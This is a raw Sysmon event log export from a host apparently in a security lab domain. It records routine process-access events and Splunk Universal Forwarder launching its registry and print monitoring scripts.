13:34:20.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.439{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E5C-6005-6300-00000000A301}3512C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.439{59A5CD1D-8E56-6005-3000-00000000A301}25323660C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E5C-6005-6300-00000000A301}3512C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.441{59A5CD1D-8E5C-6005-6300-00000000A301}3512C:\Windows\System32\cmd.exe10.0.14393.0 
(rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinRegMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.330{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5C-6005-6200-00000000A301}3652C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.330{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E5C-6005-6200-00000000A301}3652C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.330{59A5CD1D-8E56-6005-3000-00000000A301}25323660C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E5C-6005-6200-00000000A301}3652C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.332{59A5CD1D-8E5C-6005-6200-00000000A301}3652C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinPrintMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.220{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5C-6005-6100-00000000A301}3464C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.220{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.220{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 